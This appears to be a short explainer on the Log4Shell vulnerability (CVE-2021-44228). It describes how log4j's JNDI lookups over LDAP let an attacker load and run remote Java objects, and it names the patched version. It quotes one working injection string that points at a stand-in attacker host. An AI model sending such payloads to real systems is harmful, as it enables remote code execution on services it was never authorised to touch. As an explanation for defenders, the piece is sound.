TL;DR: log4j vulnerability
LDAP & JNDI
Java allows connecting to an LDAP server to retrieve attributes from an object. For example, the URL ldap://server:389/o=Test
can be used to find the Test
object from any LDAP server. JNDI is a Java feature which allows Java objects to be loaded and used by a Java program during runtime.
Exploitation
log4j implements lookups, meaning you could have written ${env:PWD}
and get the PWD
environment variable logged. Moreover, JNDI lookup was enabled by default: you could have written
and get the server lookup that URL, then load and execute, using JNDI, the Java object that was returned. Therefore, an attacker can host a malicious Java object and expose it with LDAP to get a nice RCE.${jndi:ldap://evil.com/}
Who is vulnerable?
Applications that use log4j to log input from the user are vulnerable, and log4j is heavily used across the internet. Note that there is currently only one critical vulnerability (CVE-2021-44228) that you should immediately fix. The rest (CVE-2021-4104, CVE-2021-45046) are not that interesting, as they require an attacker to be able to edit configuration files or rely on specific configs. log4j disabled JNDI by default from 2.16.0.